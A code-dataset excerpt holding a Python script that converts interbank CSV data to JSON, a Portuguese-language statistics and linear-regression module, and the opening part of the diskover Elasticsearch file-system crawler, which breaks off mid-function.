+{"seq_id":"324871117","text":"import os\nimport json\nimport csv\nimport re\nfrom operator import itemgetter\n\n#saving to directory\nDIR ='data' \n\n#file title config (also allows for capitalised version)\nedgeFileName = \"matrix\"\nnodeFileName = \"bank\"\n\n#global Variables\nsectorKey = 'Sector'\nnameKey = 'Node'\ncolorKey = 'Color'\ndecimalSeparator = \".\"\nscalingForValues = 1\n\ndef gettimestamp(filename):\n thestring = filename\n timeformat = re.compile(\"20\\d\\d\\d\\d\")\n result = timeformat.search(thestring)\n if result:\n return (result.string[result.start():result.end()])\n\ndef cleaned_input(file):\n try:\n csv_input = csv.reader(file,delimiter='|')\n data=[]\n for idx,row in enumerate(csv_input):\n for item in row:\n item.replace('\"','')\n cleanedRow= row[0].split(',')\n if idx == 0:\n keyArray = cleanedRow\n else:\n valueArray = cleanedRow\n dictRow = {}\n for idx1,value in enumerate(valueArray):\n dictRow[keyArray[idx1]] = value\n #add_date(dictRow,edgeDates)\n data.append(dictRow)\n except TypeError:\n return []\n return data\n\ndef add_date(row,dateString):\n year=dateString[0:4]\n\n if dateString[4]== '0':\n month=dateString[5]\n else:\n month=dateString[4:6]\n \n formattedDate=year+'/'+month\n dateID=int(year)*12+int(month)\n\n row['date']=formattedDate\n row['dateID']=dateID\n return\n\ndef add_assetName(row,assetName):\n row['asset']=assetName\n return\n\ndef add_regionName(row,regionName):\n row['region']=regionName\n return\n\ndef read_file(file,filename,region,asset):\n data = cleaned_input(file)\n\n for row in data:\n add_date(row,gettimestamp(filename))\n add_assetName(row,asset.name)\n add_regionName(row,region.name)\n\n return data\n\ndef fix_decimals(values):\n dotValues=[]\n for val in values:\n val = str(val)\n val = val.replace(decimalSeparator,\".\")\n dotValues.append(val)\n return dotValues\n\ndef check_forZeros(row,categoryKeys):\n allZeros=True\n for key in categoryKeys:\n if (row[key]>0):\n allZeros=False\n return allZeros\n return allZeros\n\ndef set_row(inputRowRaw,keys,categoryKeys):\n\n #to list\n inputRow=list(inputRowRaw.values())\n \n #create output\n outputRow={}\n outputRow['id']=str(inputRow[0])\n outputRow['name']=str(inputRow[keys.index(nameKey)])\n outputRow['sector']=str(inputRow[keys.index(sectorKey)])\n outputRow['date']=inputRowRaw['date']\n outputRow['dateID']=inputRowRaw['dateID']\n outputRow['region']=inputRowRaw['region']\n outputRow['asset']=inputRowRaw['asset']\n\n #adding categories\n for key in categoryKeys:\n val = str(inputRowRaw[key])\n val = val.replace(decimalSeparator,\".\",1)\n try:\n outputRow[key]=float(val)/scalingForValues\n except ValueError or TypeError:\n outputRow[key]=0\n return outputRow\n\ndef set_keys():\n return ['Node','Sector','time','Assets','Liabilities','date','dateID'] \n\ndef set_categories():\n categoryKeys = ['Assets','Liabilities','no value']\n return categoryKeys\n\ndef set_dates(nodes):\n unsortedDates=[]\n unique=[]\n for node in nodes:\n if node['dateID'] not in unique:\n unsortedDates.append({'date': node['date'], 'dateID': node['dateID']})\n unique.append(node['dateID'])\n dates = sorted(unsortedDates, key=itemgetter('dateID')) \n return dates\n\ndef set_sectors(nodes):\n sectors=[]\n unique=[]\n for node in nodes:\n if node['sector'] not in unique:\n sectors.append({'sector': node['sector']})\n unique.append(node['sector'])\n sectors.append({'sector': 'all'})\n return sectors\n\ndef set_names(nodes):\n banks=[]\n unique=[]\n for node in nodes:\n if node['id'] not in unique:\n banks.append({'id': node['id']})\n unique.append(node['id'])\n return banks\n\ndef set_regions(nodes):\n banks=[]\n unique=[]\n for node in nodes:\n if node['region'] not in unique:\n banks.append({'region': node['region']})\n unique.append(node['region'])\n return banks\n\ndef set_assets(nodes):\n banks=[]\n unique=[]\n for node in nodes:\n if node['asset'] not in unique:\n banks.append({'asset': node['asset']})\n unique.append(node['asset'])\n return banks\n\ndef transform_nodes(nodes,keys):\n categoryKeys = set_categories()\n transformedNodes=[] \n for idx, row in enumerate(nodes):\n outputRow = set_row(row,keys,categoryKeys[:-1])\n allZeros = check_forZeros(outputRow,categoryKeys)\n #don't add unspecified ids or nodes for which all numeric values = 0\n if outputRow['id'] is not '' and allZeros is False:\n transformedNodes.append(outputRow)\n return transformedNodes\n\ndef transform_edges(edges):\n transformedEdges=[]\n\n for row in edges:\n rowValues=list(row.values())\n rowValues=fix_decimals(rowValues)\n rowKeys=list(row.keys())\n\n #source is the 0 column\n source=rowValues[0]\n region=row['region']\n asset=row['asset']\n idx=1\n\n #skipping over the first column\n while idx < len(rowKeys)-1:\n #all targets start with '_'\n if '_' in rowKeys[idx]:\n target = rowKeys[idx][1:]\n #only add edges not connecting node to itself\n try:\n float(rowValues[idx])\n except ValueError:\n return []\n if source != target and float(rowValues[idx]) != 0: \n transformedEdges.append({'region': region, 'asset': asset, 'from': source, 'to': target, 'absValue': int(float(rowValues[idx])/scalingForValues), 'date': row['date'], 'dateID': row['dateID']})\n idx+=1\n return transformedEdges\n\ndef upload_files():\n path=os.path.abspath(\"C:/Users/Philippa/Repo/WhomToWhom/upload_data/Data\")\n edges=[]\n nodes=[]\n #iterator 1 for all regions\n with os.scandir(path) as it1:\n for region in it1:\n if not region.name.startswith('.'):\n #iterator 2 for all assets\n with os.scandir(region) as it2:\n for asset in it2:\n if not asset.name.startswith('.'):\n #iterator for individual files\n for filename in os.listdir(asset):\n filepath=os.path.join(region,asset, filename)\n with open(filepath) as file:\n #collecting edge files\n if edgeFileName in filename or edgeFileName.capitalize() in filename:\n edges = edges + read_file(file,filename,region,asset)\n if nodeFileName in filename or nodeFileName.capitalize() in filename:\n nodes = nodes + read_file(file,filename,region,asset) \n\n edges=transform_edges(edges)\n nodes=transform_nodes(nodes,set_keys())\n \n #OUTPUT CHECK\n for row in edges[1:10]:\n print(row)\n for row in nodes[1:10]:\n print(row)\n \n data = [edges,nodes]\n return data\n\ndef save_data():\n # data[0]=edges, data[1]=nodes \n edges,nodes = upload_files()\n categoryKeys = set_categories()\n dates = set_dates(nodes)\n sectors = set_sectors(nodes)\n banks = set_names(nodes)\n regions = set_regions(nodes)\n assets = set_assets(nodes)\n data = {\"edges\": edges,\"nodes\":nodes, \"categoryKeys\": categoryKeys, \"dates\": dates, \"sectors\":sectors,\"banks\":banks, \"regions\": regions, \"assets\": assets}\n \n filename = 'data.json'\n with open (filename,'w') as file:\n json.dump(data,file)\n\nif __name__ == '__main__':\n save_data()\n \n \n ","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":8103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"152591169","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 17 12:00:09 2020\n\n@author: victor.veiga\n\"\"\"\n\n\n\"Todas as funções de estatísticas\"\n\ndef minimo(lista: list) -> float:\n \"\"\"Funcao para encontrar o menor valor em uma dada lista. \n argumentos:\n arquivo(list) = lista a ser avaliada\n \n ex: minimo([1,2,3])\n retorna: 1\n \"\"\"\n minimo = lista[0]\n for i in lista:\n if i < minimo:\n minimo = i\n return minimo\n\ndef maximo(lista: list) -> float:\n \"\"\"Funcao para encontrar o menor valor em uma dada lista. \n argumentos:\n arquivo(list) = lista a ser avaliada\n \n ex: maximo([1,2,3])\n retorna: 1\n \"\"\"\n maximo = lista[0]\n for i in lista:\n if i > maximo:\n maximo = i\n return maximo\n\ndef n_raiz(x, n):\n \"\"\"Função para encontrar a n-ésima raiz de um número real.\n \n argumentos:\n x(int) = Número real que se deseja encontrar a raiz.\n n(int) = Indicaçao de qual raiz se deseja calcular.\n \n ex: n_raiz(16,2)\n retorna: 4\n \"\"\"\n #Sabendo que a n-ésima raiz pode ser encarada como um número elevado a (1/n)\n return x ** (1/n)\n\ndef soma_lista(lista):\n \"\"\"Função para encontrar a soma de uma dada lista.\n \n argumentos:\n lista(list) = lista a ser somada.\n \n ex: soma_lista([1,2,3])\n retorna: 6\n \"\"\"\n soma = 0\n for item in lista:\n soma += item\n return soma\n\ndef media_lista(lista):\n \"\"\"Função para encontrar a média de uma dada lista.\n \n argumentos:\n lista(list) = lista para a média.\n \n ex: media_lista([1,2,3])\n retorna: 2\n \"\"\"\n media = soma_lista(lista)/len(lista)\n return media\n\ndef variancia(l: list) -> float:\n \"\"\"Função para encontrar a variância de uma dada lista.\n Args:\n l (list): lista para se encontrar a variância.\n Returns:\n float: variância da lista inserida\n \"\"\"\n media = media_lista(l)\n tamanho = len(l)\n \n diff_quad = [(x-media) ** 2 for x in l] \n soma = soma_lista(diff_quad)\n var = soma / (tamanho - 1) #tamanho - 1 ou apenas tamanho?\n return var\n\n\ndef cova(lista1, lista2):\n \"\"\"Função para encontrar a covariancia entre duas listas.\n \n argumentos:\n lista1(list) = Primeira lista.\n lista2(list) = Segunda lista.\n \n ex: cova([1,2,3], [3,2,1])\n retorna: -1.0\n \"\"\"\n #Aqui, o n do divisor será o número de elementos da lista\n n = len(lista1)\n \n media1 = media_lista(lista1)\n media2 = media_lista(lista2)\n \n #No numerador teremos o somatório da multiplicaçao entre (xi - xmed) e (yi - ymed)\n var = soma_lista([(lista1[item]-media1) * (lista2[item]-media2) for item in range(len(lista1))])\n \n #E para a covariancia da amostra, dividimos o resultado por n-1\n cov = (var/(n-1))\n return cov\n\ndef fit(x_features: list, y_target: list) -> tuple:\n \"\"\"Função para realizar o ajuste linear entre 2 listas de variáveis, sendo uma feature e um target.\n Args:\n x_features (list): lista com os valores da feature utilizada para a previsão\n y_target (list): lista com os valores do target\n Returns:\n alpha(float): parâmetro alpha da regressão linear\n beta(float): parâmetro beta da regressão linear\n \"\"\"\n y_media = media_lista(y_target)\n x_media = media_lista(x_features)\n\n beta = cova(x_features, y_target) / variancia(x_features)\n alpha = y_media - (beta*x_media)\n return alpha, beta\n\ndef pred(alpha: float, beta: float, x_features: list) -> list:\n \"\"\"Função para fazer a previsão a partir de um ajuste linear\n Args:\n alpha(float): parâmetro alpha da regressão linear\n beta(float): parâmetro beta da regressão linear\n x_features (list): lista com os valores da feature utilizada para a previsão\n Returns:\n list: Lista com os valores previstos\n \"\"\"\n y_hat = [alpha + (beta*x) for x in x_features]\n return y_hat\n\ndef rmse(observado, previsto):\n \"\"\"Função para encontrar a raiz do erro médio quadrático entre duas listas.\n \n argumentos:\n observado(list) = lista com os valores reais(observados).\n previsto(list) = lista com os valors previstos.\n \n ex: \n alpha, beta = fit(dict_values['RM'], dict_values['MEDV']) \n previsto = pred(alpha, beta, dict_values['RM'] )\n observado = dict_values['MEDV']\n rmse(observado, previsto)\n retorna: ******\n \"\"\"\n #Primeiro calculo o erro quadrático, depois temos a raiz para o rmse\n erro_quadratico = (soma_lista([((observado[item]-previsto[item])**2) for item in range(len(previsto))]))/len(previsto)\n rmse = n_raiz(erro_quadratico, 2)\n return rmse","sub_path":"SOURCE/AUX_LIB/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":4708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"611648810","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"diskover - Elasticsearch file system crawler\ndiskover is a file system crawler that index's\nyour file metadata into Elasticsearch.\nSee README.md or https://github.com/shirosaidev/diskover\nfor more information.\n\nCopyright (C) Chris Park 2017\ndiskover is released under the Apache 2.0 license. See\nLICENSE for the full license text.\n\"\"\"\n\ntry:\n from elasticsearch5 import Elasticsearch, helpers, RequestsHttpConnection,\\\n Urllib3HttpConnection\nexcept ImportError:\n from elasticsearch import Elasticsearch, helpers, RequestsHttpConnection,\\\n Urllib3HttpConnection\nfrom scandir import scandir, walk, GenericDirEntry\nfrom random import randint\nfrom datetime import datetime\nfrom subprocess import Popen, PIPE\ntry:\n import queue as Queue\nexcept ImportError:\n import Queue\nimport threading\ntry:\n import configparser as ConfigParser\nexcept ImportError:\n import ConfigParser\nimport os\nimport sys\nimport imp\nimport time\nimport argparse\nimport hashlib\nimport logging\nimport base64\nimport math\nimport json\nimport socket\nimport pwd\nimport grp\nimport uuid\n\nIS_PY3 = sys.version_info >= (3, 0)\n\n# version\nDISKOVER_VERSION = '1.4.5'\n__version__ = DISKOVER_VERSION\nBANNER_COLOR = '35m'\n# totals for crawl stats output\ntotal_files = 0\ntotal_files_skipped = 0\ntotal_file_size = 0\ntotal_file_size_skipped = 0\ntotal_dupes = 0\ntotal_dirs = 0\ntotal_dirs_skipped = 0\ntotal_hash_groups = 0\ndupe_count = 0\n# dict to hold socket tasks\nsocket_tasks = {}\n# list of socket client\nclientlist = []\n# last percent for progress output\nlast_percents = 0\n# get seconds since epoch used for elapsed time\nSTARTTIME = time.time()\n# lists to hold file and dir info for reindexing (for preserving tags)\nreindex_file_list = []\nreindex_dir_list = []\n\n# plugins\nplugin_dir = os.path.dirname(os.path.realpath(__file__)) + \"/plugins\"\nmain_module = \"__init__\"\n# Stores all the dynamically loaded plugins\nplugins = []\n\n\ndef get_plugins_info():\n \"\"\"This is the get plugins info function.\n It gets a list of python plugins info (modules) in\n the plugins directory and returns the plugins information.\n \"\"\"\n plugins_info = []\n possible_plugins = os.listdir(plugin_dir)\n for i in possible_plugins:\n location = os.path.join(plugin_dir, i)\n if not os.path.isdir(location) or not main_module + \".py\" \\\n in os.listdir(location):\n continue\n info = imp.find_module(main_module, [location])\n plugins_info.append({\"name\": i, \"info\": info})\n return plugins_info\n\n\ndef load_plugins():\n \"\"\"This is the load plugins function.\n It dynamically load the plugins and return them in a list\n \"\"\"\n loaded_plugins = []\n plugins_info = get_plugins_info()\n for plugin_info in plugins_info:\n plugin_module = imp.load_module(main_module, *plugin_info[\"info\"])\n loaded_plugins.append(plugin_module)\n return loaded_plugins\n\n\ndef list_plugins():\n \"\"\"This is the list plugins function.\n It prints the name of all the available plugins\n \"\"\"\n plugins_info = get_plugins_info()\n\n for plugin_info in plugins_info:\n print(plugin_info[\"name\"])\n\n\ndef add_diskspace(path):\n \"\"\"This is the add disk space function.\n It adds total, used, free and available\n disk space for a path to ES.\n \"\"\"\n statvfs = os.statvfs(path)\n # Size of filesystem in bytes\n total = statvfs.f_frsize * statvfs.f_blocks\n # Actual number of free bytes\n free = statvfs.f_frsize * statvfs.f_bfree\n # Number of free bytes that ordinary users are allowed\n # to use (excl. reserved space)\n available = statvfs.f_frsize * statvfs.f_bavail\n used = total - free\n indextime_utc = datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%S.%f\")\n data = {\n \"path\": path,\n \"total\": total,\n \"used\": used,\n \"free\": free,\n \"available\": available,\n \"indexing_date\": indextime_utc\n }\n # add to ES\n LOGGER.info('Adding disk space info to ES index')\n ES.index(index=CLIARGS['index'], doc_type='diskspace', body=data)\n\n\ndef add_crawl_stats(start, stop=None, elapsed=None):\n \"\"\"This is the add crawl stats function.\n It adds start, end, elapsed time info to ES.\n \"\"\"\n if stop:\n stop = datetime.utcfromtimestamp(stop).strftime('%Y-%m-%dT%H:%M:%S.%f')\n data = {\n \"path\": os.path.abspath(CLIARGS['rootdir']),\n \"stop_time\": stop,\n \"elapsed_time\": elapsed,\n \"indexing_date\": datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%S.%f\")\n }\n ES.index(index=CLIARGS['index'], doc_type='crawlstat_stop', body=data)\n else:\n start = datetime.utcfromtimestamp(start).strftime('%Y-%m-%dT%H:%M:%S.%f')\n data = {\n \"path\": os.path.abspath(CLIARGS['rootdir']),\n \"start_time\": start,\n \"indexing_date\": datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%S.%f\")\n }\n ES.index(index=CLIARGS['index'], doc_type='crawlstat_start', body=data)\n\n\ndef print_banner():\n \"\"\"This is the print banner function.\n It prints a random banner.\n \"\"\"\n global BANNER_COLOR\n c = randint(1, 4)\n if c == 1:\n BANNER_COLOR = '31m'\n elif c == 2:\n BANNER_COLOR = '32m'\n elif c == 3:\n BANNER_COLOR = '33m'\n elif c == 4:\n BANNER_COLOR = '35m'\n\n botbanner = \"\"\"\\033[%s\n\n ___ _ ____ _ _ ____ _ _ ____ ____ ;\n |__> | ==== |-:_ [__] \\/ |=== |--< [\"]\n ____ ____ ____ _ _ _ ___ ____ ___ /[_]\\\\\n |___ |--< |--| |/\\| |___ |==] [__] | ] [ v%s\n\n\n\\033[0m\"\"\" % (BANNER_COLOR, DISKOVER_VERSION)\n if CLIARGS['crawlbot']:\n banner = botbanner\n else:\n b = randint(1, 4)\n if b == 1:\n banner = \"\"\"\\033[%s\n\n ________ .__ __\n \\______ \\ |__| _____| | _________ __ ___________\n | | \\| |/ ___/ |/ / _ \\ \\/ // __ \\_ __ \\\\ /)___(\\\\\n | ` \\ |\\___ \\| < <_> ) /\\ ___/| | \\/ (='.'=)\n /_______ /__/____ >__|_ \\____/ \\_/ \\___ >__| (\\\\\")_(\\\\\")\n \\/ \\/ \\/ v%s \\/\n https://shirosaidev.github.io/diskover\n Crawling all your stuff.\n Support diskover on Patreon or PayPal :)\\033[0m\n\n \"\"\" % (BANNER_COLOR, DISKOVER_VERSION)\n elif b == 2:\n banner = \"\"\"\\033[%s\n\n ___ ___ ___ ___ ___ ___ ___ ___\n /\\ \\ /\\ \\ /\\ \\ /\\__\\ /\\ \\ /\\__\\ /\\ \\ /\\ \\\\\n /::\\ \\ _\\:\\ \\ /::\\ \\ /:/ _/_ /::\\ \\ /:/ _/_ /::\\ \\ /::\\ \\\\\n/:/\\:\\__\\ /\\/::\\__\\ /\\:\\:\\__\\ /::-\"\\__\\ /:/\\:\\__\\ |::L/\\__\\ /::\\:\\__\\ /::\\:\\__\\\\\n\\:\\/:/ / \\::/\\/__/ \\:\\:\\/__/ \\;:;-\",-\" \\:\\/:/ / |::::/ / \\:\\:\\/ / \\;:::/ /\n \\::/ / \\:\\__\\ \\::/ / |:| | \\::/ / L;;/__/ \\:\\/ / |:\\/__/\n \\/__/ \\/__/ \\/__/ \\|__| \\/__/ v%s \\/__/ \\|__|\n https://shirosaidev.github.io/diskover\n Bringing light to the darkness.\n Support diskover on Patreon or PayPal :)\\033[0m\n\n \"\"\" % (BANNER_COLOR, DISKOVER_VERSION)\n elif b == 3:\n banner = \"\"\"\\033[%s\n\n _/_/_/ _/ _/\n _/ _/ _/_/_/ _/ _/ _/_/ _/ _/ _/_/ _/ _/_/\n _/ _/ _/ _/_/ _/_/ _/ _/ _/ _/ _/_/_/_/ _/_/\n _/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/\n _/_/_/ _/ _/_/_/ _/ _/ _/_/ _/ v%s _/_/_/ _/\n https://shirosaidev.github.io/diskover\n \"I didn't even know that was there.\"\n Support diskover on Patreon or PayPal :)\\033[0m\n\n \"\"\" % (BANNER_COLOR, DISKOVER_VERSION)\n elif b == 4:\n banner = \"\"\"\\033[%s\n\n __ __\n /\\ \\ __ /\\ \\\\\n \\_\\ \\/\\_\\ ____\\ \\ \\/'\\\\ ___ __ __ __ _ __ //\n /'_` \\/\\ \\ /',__\\\\\\ \\ , < / __`\\/\\ \\/\\ \\ /'__`\\/\\`'__\\\\ ('>\n /\\ \\L\\ \\ \\ \\/\\__, `\\\\\\ \\ \\\\\\`\\ /\\ \\L\\ \\ \\ \\_/ |/\\ __/\\ \\ \\/ /rr\n \\ \\___,_\\ \\_\\/\\____/ \\ \\_\\ \\_\\ \\____/\\ \\___/ \\ \\____\\\\\\ \\\\_\\\\ *\\))_\n \\/__,_ /\\/_/\\/___/ \\/_/\\/_/\\/___/ \\/__/ \\/____/ \\\\/_/ v%s\n https://shirosaidev.github.io/diskover\n \"Holy s*i# there are so many temp files.\"\n Support diskover on Patreon or PayPal :)\\033[0m\n\n \"\"\" % (BANNER_COLOR, DISKOVER_VERSION)\n sys.stdout.write(banner)\n sys.stdout.write('\\n')\n sys.stdout.flush()\n\n\ndef print_progress_bar(iteration, total, prefix='', suffix='',\n it_name='it', finished=False):\n \"\"\"This is the create terminal progress bar function.\n It outputs a progress bar and shows progress of the queue.\n \"\"\"\n global last_percents\n\n if finished:\n iteration = total\n\n # calculate number of iterations per second and eta\n time_diff = time.time() - STARTTIME\n it_per_sec = round(iteration / time_diff, 1)\n try:\n eta = get_time((total - iteration) / it_per_sec)\n except ZeroDivisionError:\n eta = get_time(0)\n\n decimals = 0\n bar_length = 20\n str_format = \"{0:.\" + str(decimals) + \"f}\"\n try:\n percents = int(str_format.format(100 * (iteration / float(total))))\n except ZeroDivisionError:\n percents = 0\n try:\n filled_length = int(round(bar_length * iteration / float(total)))\n except ZeroDivisionError:\n filled_length = 0\n bar = '█' * filled_length + ' ' * (bar_length - filled_length)\n # only output if percents has increased\n if percents > last_percents or finished:\n sys.stdout.write(\n '\\r\\033[' + BANNER_COLOR + '\\033[1m%s %s%s|%s| %s [%s, %s %s/s]\\033[0m'\n % (prefix, percents, '%', bar, suffix, eta, it_per_sec, it_name))\n sys.stdout.flush()\n last_percents = percents\n\n\ndef print_progress(iteration, total, it_name='it', finished=False):\n \"\"\"This is the create terminal progress function.\n It outputs just progress of the queue in json format.\n \"\"\"\n global last_percents\n\n if finished:\n iteration = total\n\n # calculate number of dirs per second and eta\n time_diff = time.time() - STARTTIME\n it_per_sec = round(iteration / time_diff, 1)\n try:\n eta = get_time((total - iteration) / it_per_sec)\n except ZeroDivisionError:\n eta = get_time(0)\n\n decimals = 0\n str_format = \"{0:.\" + str(decimals) + \"f}\"\n try:\n percents = int(str_format.format(100 * (iteration / float(total))))\n except ZeroDivisionError:\n percents = 0\n # only output if percents has increased\n if percents > last_percents or finished:\n sys.stdout.write(\n '{\"msg\": \"progress\", \"percent\": %s, \"eta\": \"%s\", \"it_per_sec\": %s, \"it_name\": \"%s\"}\\n'\n % (percents, eta, it_per_sec, it_name))\n sys.stdout.flush()\n last_percents = percents\n\n\ndef load_config():\n \"\"\"This is the load config function.\n It checks for config file and loads in\n the config settings.\n \"\"\"\n configsettings = {}\n config = ConfigParser.ConfigParser()\n dir_path = os.path.dirname(os.path.realpath(__file__))\n configfile = '%s/diskover.cfg' % dir_path\n # Check for config file\n if not os.path.isfile(configfile):\n print('Config file diskover.cfg not found')\n sys.exit(1)\n config.read(configfile)\n try:\n d = config.get('excludes', 'dirs')\n configsettings['excluded_dirs'] = d.split(',')\n except Exception:\n configsettings['excluded_dirs'] = []\n try:\n f = config.get('excludes', 'files')\n configsettings['excluded_files'] = f.split(',')\n except Exception:\n configsettings['excluded_files'] = []\n try:\n configsettings['aws'] = config.get('elasticsearch', 'aws')\n except Exception:\n configsettings['aws'] = \"False\"\n try:\n configsettings['es_host'] = config.get('elasticsearch', 'host')\n except Exception:\n configsettings['es_host'] = \"localhost\"\n try:\n configsettings['es_port'] = int(config.get('elasticsearch', 'port'))\n except Exception:\n configsettings['es_port'] = 9200\n try:\n configsettings['es_user'] = config.get('elasticsearch', 'user')\n except Exception:\n configsettings['es_user'] = ''\n try:\n configsettings['es_password'] = config.get('elasticsearch', 'password')\n except Exception:\n configsettings['es_password'] = ''\n try:\n configsettings['index'] = config.get('elasticsearch', 'indexname')\n except Exception:\n configsettings['index'] = ''\n try:\n configsettings['es_timeout'] = \\\n int(config.get('elasticsearch', 'timeout'))\n except Exception:\n configsettings['es_timeout'] = 10\n try:\n configsettings['es_maxsize'] = \\\n int(config.get('elasticsearch', 'maxsize'))\n except Exception:\n configsettings['es_maxsize'] = 10\n try:\n configsettings['es_max_retries'] = \\\n int(config.get('elasticsearch', 'maxretries'))\n except Exception:\n configsettings['es_max_retries'] = 0\n try:\n configsettings['es_chunksize'] = \\\n int(config.get('elasticsearch', 'chunksize'))\n except Exception:\n configsettings['es_chunksize'] = 500\n try:\n configsettings['listener_host'] = config.get('socketlistener', 'host')\n except Exception:\n configsettings['listener_host'] = \"localhost\"\n try:\n configsettings['listener_port'] = \\\n int(config.get('socketlistener', 'port'))\n except Exception:\n configsettings['listener_port'] = 9999\n try:\n configsettings['listener_diskover_path'] = \\\n config.get('socketlistener', 'diskoverpath')\n except Exception:\n configsettings['listener_diskover_path'] = \"/usr/local/bin/diskover.py\"\n try:\n configsettings['listener_python_path'] = \\\n config.get('socketlistener', 'pythonpath')\n except Exception:\n configsettings['listener_python_path'] = \"python\"\n try:\n configsettings['md5_readsize'] = \\\n int(config.get('dupescheck', 'readsize'))\n except Exception:\n configsettings['md5_readsize'] = 65536\n try:\n configsettings['botsleep'] = \\\n float(config.get('crawlbot', 'sleeptime'))\n except Exception:\n configsettings['botsleep'] = 0.1\n try:\n configsettings['gource_maxfilelag'] = \\\n float(config.get('gource', 'maxfilelag'))\n except Exception:\n configsettings['gource_maxfilelag'] = 5\n\n return configsettings\n\n\ndef parse_cli_args(indexname):\n \"\"\"This is the parse CLI arguments function.\n It parses command line arguments.\n \"\"\"\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-d\", \"--rootdir\", metavar='PATH', default=\".\",\n help=\"Directory to start crawling from (default: .)\")\n parser.add_argument(\"-m\", \"--mtime\", metavar='DAYS', default=0, type=int,\n help=\"Minimum days ago for modified time (default: 0)\")\n parser.add_argument(\"-s\", \"--minsize\", metavar='BYTES', default=1, type=int,\n help=\"Minimum file size in Bytes (default: >0B)\")\n parser.add_argument(\"-t\", \"--threads\", default=8, type=int,\n help=\"Number of threads to use (default: 8)\")\n parser.add_argument(\"-i\", \"--index\", default=indexname,\n help=\"Elasticsearch index name (default: from config)\")\n parser.add_argument(\"-n\", \"--nodelete\", action=\"store_true\",\n help=\"Add data to existing index (default: overwrite \\\n index)\")\n parser.add_argument(\"-b\", \"--breadthfirst\", action=\"store_true\",\n help=\"Breadthfirst crawl (default: depthfirst)\")\n parser.add_argument(\"-M\", \"--maxdepth\", type=int, default=100,\n help=\"Maximum directory depth to crawl (default: \\\n 100)\")\n parser.add_argument(\"-r\", \"--reindex\", action=\"store_true\",\n help=\"Reindex (freshen) directory (non-recursive)\")\n parser.add_argument(\"-R\", \"--reindexrecurs\", action=\"store_true\",\n help=\"Reindex directory and all subdirs (recursive)\")\n parser.add_argument(\"-f\", \"--file\",\n help=\"Index single file\")\n parser.add_argument(\"-D\", \"--finddupes\", action=\"store_true\",\n help=\"Find duplicate files in existing index and update \\\n their dupe_md5 field\")\n parser.add_argument(\"-S\", \"--dirsize\", metavar='DIR', nargs=\"?\", const=\"all\",\n help=\"Calculate size of directories in existing index \\\n (default: all dirs)\")\n parser.add_argument(\"-C\", \"--copytags\", metavar='INDEX2', nargs=1,\n help=\"Copy tags from index2 to index\")\n parser.add_argument(\"-B\", \"--crawlbot\", action=\"store_true\",\n help=\"Starts up crawl bot to scan for dir changes in index\")\n parser.add_argument(\"-l\", \"--listen\", action=\"store_true\",\n help=\"Open socket and listen for remote commands\")\n parser.add_argument(\"--gourcert\", action=\"store_true\",\n help=\"Get realtime crawl data from ES for gource\")\n parser.add_argument(\"--gourcemt\", action=\"store_true\",\n help=\"Get file mtime data from ES for gource\")\n parser.add_argument(\"--nice\", action=\"store_true\",\n help=\"Runs in nice mode (less cpu/disk io)\")\n parser.add_argument(\"-q\", \"--quiet\", action=\"store_true\",\n help=\"Runs with no output\")\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\",\n help=\"Increase output verbosity\")\n parser.add_argument(\"--debug\", action=\"store_true\",\n help=\"Debug message output\")\n parser.add_argument(\"--progress\", action=\"store_true\",\n help=\"Only output progress (json)\")\n parser.add_argument(\"--listplugins\", action=\"store_true\",\n help=\"List plugins\")\n parser.add_argument(\"-V\", \"--version\", action=\"version\",\n version=\"diskover v%s\" % DISKOVER_VERSION,\n help=\"Prints version and exits\")\n args = parser.parse_args()\n return args\n\n\ndef crawl_path(path, threadnum, filelist, dirlist):\n \"\"\"This is the crawl path function.\n It crawls the directory in path using scandir and adds to\n dirlist and filelist lists.\n Returns if directory in 'excluded_dirs' or path is None.\n \"\"\"\n global total_dirs\n\n # add the directory and it's files to ES\n if VERBOSE:\n LOGGER.info('[thread-%s]: Crawling: %s', threadnum, path)\n with lock:\n total_dirs += 1\n\n # crawl directory using scandir\n try:\n if VERBOSE:\n LOGGER.info('[thread-%s]: Getting meta for dir: %s',\n threadnum, path)\n # get directory meta info and add to dirlist\n dirlist = get_dir_meta(threadnum, path, dirlist)\n\n # check maxdepth\n root = os.path.abspath(CLIARGS['rootdir']).rstrip(os.path.sep)\n num_sep = root.count(os.path.sep)\n depth = path.count(os.path.sep) - num_sep\n if depth < CLIARGS['maxdepth']:\n for entry in scandir(path):\n if entry.is_symlink():\n if VERBOSE:\n LOGGER.info('[thread-%s]: Skipping symlink: %s',\n threadnum, entry.path)\n continue\n if entry.is_file():\n if VERBOSE:\n LOGGER.info('[thread-%s]: Getting meta for file: %s',\n threadnum, entry.path)\n # get file meta info and add to filelist\n filelist = get_file_meta(threadnum, entry, filelist)\n\n except (IOError, OSError):\n if VERBOSE:\n LOGGER.error(\n 'Failed to crawl directory %s', path, exc_info=True)\n pass\n\n return filelist, dirlist\n\n\ndef update_progress(finished=False):\n \"\"\"Updates progress on screen.\"\"\"\n if CLIARGS['quiet'] or VERBOSE:\n return\n if CLIARGS['finddupes']:\n t = total_hash_groups\n i = t - q.qsize()\n prefix = \"Checking:\"\n it_name = \"hg\"\n elif CLIARGS['dirsize']:\n with lock:\n t = total_dirs\n i = t - q.qsize()\n prefix = \"Calculating:\"\n it_name = \"dir\"\n elif CLIARGS['copytags']:\n with lock:\n t = total_dirs + total_files\n i = t - q.qsize()\n prefix = \"Copying:\"\n it_name = \"doc\"\n else:\n with lock:\n t = total_dirs\n i = t - q.qsize()\n prefix = \"Crawling:\"\n it_name = \"dir\"\n if i > 0 and i % 10 == 0 or finished:\n if CLIARGS['progress']:\n print_progress(i, t, it_name, finished)\n else:\n print_progress_bar(i, t, prefix, '%s/%s' % (i, t), it_name, finished)\n\n\ndef crawl_worker(threadnum):\n \"\"\"This is the crawl worker function.\n It 